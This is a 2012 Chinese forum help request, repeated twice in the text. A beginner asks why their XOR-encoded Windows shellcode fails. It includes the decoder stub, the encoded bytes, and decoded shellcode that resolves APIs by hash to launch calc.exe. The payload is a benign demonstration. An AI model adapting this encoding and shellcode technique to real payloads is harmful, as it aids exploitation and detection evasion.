-
-
[旧帖] [求助shellcode问题] 0.00雪花
-
发表于: 2012-7-27 21:43
-
初学shellcode,遇到难题了,
下面这段代码是我写的shellcode代码,但是在shellcode被编码之前char shell[]中的代码可以正常运行。但是被编码之后的char shellcode[]被运行,但是此时就不能正常运行了,我看过运行是解码过程和解码之后的代码是正常解码的,只是运行之后却发现有问题。运行失败,找不到问题了,求大神帮助……
/*以下是shellcode被编码之后,该代码可以不能正常运行,不知道是为什么?*/
char shellcode[]=
"\x83\xC0\x14" //ADD EAX,14
"\x33\xC9" //XOR ECX,ECX
"\x8A\x1C\x08" //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44" //XOR BL,44 //0x44是该编码的key
"\x88\x1C\x08" //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" //INC ECX
"\x80\xFB\x90" //CMP BL,90
"\x75\xF1" //JNZ SHORT "\x8A\x1C\x08"
//编码后shellcode
"\x12\x20\xcf\x71\x74\x44\x44\x44\xcf\x32\x48\xcf\x32\x58\xcf\x02"
"\x4c\xcf\x3a\x64\xcf\x72\x22\x7d\x0b\x5c\x31\xb6\x11\xc7\xa8\x64"
"\xcf\xa8\xcd\x01\x40\x2c\x76\x30\xd5\x48\x14\xac\x07\x44\x44\x44"
"\x2c\x28\x28\x44\x44\x2c\x36\x30\x6a\x20\x2c\x29\x37\x32\x27\xcf"
"\x88\x15\xbb\x94\x2c\x48\xe4\x97\x6f\x14\xac\x60\x44\x44\x44\x2e"
"\x44\x2c\x6a\x21\x3c\x21\x2c\x27\x25\x28\x27\xcf\x90\x16\xbb\x94"
"\x2c\x27\xcd\x95\x0b\xcf\x09\x40\x15\xac\x41\x44\x44\x44\x2e\x45"
"\xbb\x94\x87\xcf\xb0\xc7\x82\x40\x11\xcf\x6a\xcf\x01\x78\xcf\x10"
"\x41\x3c\x47\x91\xcf\x0e\x5c\xcf\x1e\x64\x47\x99\x16\xcf\x3a\x40"
"\xcf\x12\x4c\x0d\x15\xcf\x70\xcf\x47\xb1\x77\x96\x4b\xfa\x42\x7e"
"\x80\x30\x4b\xcf\x8e\x85\x85\x5d\x85\x8e\x43\x4f\x95\x47\x94\x02"
"\xaf\xae\x7f\x93\x1d\x30\x40\xa6\x9f\xaf\x52\x1e\xcf\x1e\x60\x47"
"\x99\x22\xcf\x48\x0f\xcf\x1e\x58\x47\x99\xcf\x40\xcf\x47\x81\x19"
"\x87\x87\xd4";
/*以下是shellcode被解码之后,该代码可以正常运行*/
char shell[]=
"\x56\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\x55\x83\xEC\x20"
"\x8B\xEC\x89\x45\x04\x68\x32\x74\x91\x0C\x50\xE8\x43\x00\x00\x00\x68\x6C\x6C\x00\x00\x68\x72\x74\x2E\x64\x68\x6D\x73\x76\x63\x8B"
"\xCC\x51\xFF\xD0\x68\x0C\xA0\xD3\x2B\x50\xE8\x24\x00\x00\x00\x6A\x00\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xD4\x52\xFF\xD0"
"\x68\x63\x89\xD1\x4F\x8B\x4D\x04\x51\xE8\x05\x00\x00\x00\x6A\x01\xFF\xD0\xC3\x8B\xF4\x83\xC6\x04\x55\x8B\x2E\x8B\x45\x3C\x8B\x54"
"\x05\x78\x03\xD5\x8B\x4A\x18\x8B\x5A\x20\x03\xDD\x52\x8B\x7E\x04\x8B\x56\x08\x49\x51\x8B\x34\x8B\x03\xF5\x33\xD2\x0F\xBE\x06\x3A"
"\xC4\x74\x0F\x8B\xCA\xC1\xC1\x19\xC1\xCA\x07\x0B\xD1\x03\xD0\x46\xEB\xEA\x3B\xD7\x59\x74\x04\xE2\xDB\xEB\x16\x5A\x8B\x5A\x24\x03"
"\xDD\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\x5D\xC3\xC3\x90";
void main()
{
_asm{
lea eax,shellcode
call eax
}
}
下面这段代码是我写的shellcode代码,但是在shellcode被编码之前char shell[]中的代码可以正常运行。但是被编码之后的char shellcode[]被运行,但是此时就不能正常运行了,我看过运行是解码过程和解码之后的代码是正常解码的,只是运行之后却发现有问题。运行失败,找不到问题了,求大神帮助……/*以下是shellcode被编码之后,该代码可以不能正常运行,不知道是为什么?*/
char shellcode[]=
"\x83\xC0\x14" //ADD EAX,14
"\x33\xC9" //XOR ECX,ECX
"\x8A\x1C\x08" //MOV BL,BYTE PTR DS:[EAX+ECX]
"\x80\xF3\x44" //XOR BL,44 //0x44是该编码的key
"\x88\x1C\x08" //MOV BYTE PTR DS:[EAX+ECX],BL
"\x41" //INC ECX
"\x80\xFB\x90" //CMP BL,90
"\x75\xF1" //JNZ SHORT "\x8A\x1C\x08"
//编码后shellcode
"\x12\x20\xcf\x71\x74\x44\x44\x44\xcf\x32\x48\xcf\x32\x58\xcf\x02"
"\x4c\xcf\x3a\x64\xcf\x72\x22\x7d\x0b\x5c\x31\xb6\x11\xc7\xa8\x64"
"\xcf\xa8\xcd\x01\x40\x2c\x76\x30\xd5\x48\x14\xac\x07\x44\x44\x44"
"\x2c\x28\x28\x44\x44\x2c\x36\x30\x6a\x20\x2c\x29\x37\x32\x27\xcf"
"\x88\x15\xbb\x94\x2c\x48\xe4\x97\x6f\x14\xac\x60\x44\x44\x44\x2e"
"\x44\x2c\x6a\x21\x3c\x21\x2c\x27\x25\x28\x27\xcf\x90\x16\xbb\x94"
"\x2c\x27\xcd\x95\x0b\xcf\x09\x40\x15\xac\x41\x44\x44\x44\x2e\x45"
"\xbb\x94\x87\xcf\xb0\xc7\x82\x40\x11\xcf\x6a\xcf\x01\x78\xcf\x10"
"\x41\x3c\x47\x91\xcf\x0e\x5c\xcf\x1e\x64\x47\x99\x16\xcf\x3a\x40"
"\xcf\x12\x4c\x0d\x15\xcf\x70\xcf\x47\xb1\x77\x96\x4b\xfa\x42\x7e"
"\x80\x30\x4b\xcf\x8e\x85\x85\x5d\x85\x8e\x43\x4f\x95\x47\x94\x02"
"\xaf\xae\x7f\x93\x1d\x30\x40\xa6\x9f\xaf\x52\x1e\xcf\x1e\x60\x47"
"\x99\x22\xcf\x48\x0f\xcf\x1e\x58\x47\x99\xcf\x40\xcf\x47\x81\x19"
"\x87\x87\xd4";
/*以下是shellcode被解码之后,该代码可以正常运行*/
char shell[]=
"\x56\x64\x8B\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\x55\x83\xEC\x20"
"\x8B\xEC\x89\x45\x04\x68\x32\x74\x91\x0C\x50\xE8\x43\x00\x00\x00\x68\x6C\x6C\x00\x00\x68\x72\x74\x2E\x64\x68\x6D\x73\x76\x63\x8B"
"\xCC\x51\xFF\xD0\x68\x0C\xA0\xD3\x2B\x50\xE8\x24\x00\x00\x00\x6A\x00\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xD4\x52\xFF\xD0"
"\x68\x63\x89\xD1\x4F\x8B\x4D\x04\x51\xE8\x05\x00\x00\x00\x6A\x01\xFF\xD0\xC3\x8B\xF4\x83\xC6\x04\x55\x8B\x2E\x8B\x45\x3C\x8B\x54"
"\x05\x78\x03\xD5\x8B\x4A\x18\x8B\x5A\x20\x03\xDD\x52\x8B\x7E\x04\x8B\x56\x08\x49\x51\x8B\x34\x8B\x03\xF5\x33\xD2\x0F\xBE\x06\x3A"
"\xC4\x74\x0F\x8B\xCA\xC1\xC1\x19\xC1\xCA\x07\x0B\xD1\x03\xD0\x46\xEB\xEA\x3B\xD7\x59\x74\x04\xE2\xDB\xEB\x16\x5A\x8B\x5A\x24\x03"
"\xDD\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDD\x8B\x04\x8B\x03\xC5\x5D\xC3\xC3\x90";
void main()
{
_asm{
lea eax,shellcode
call eax
}
}
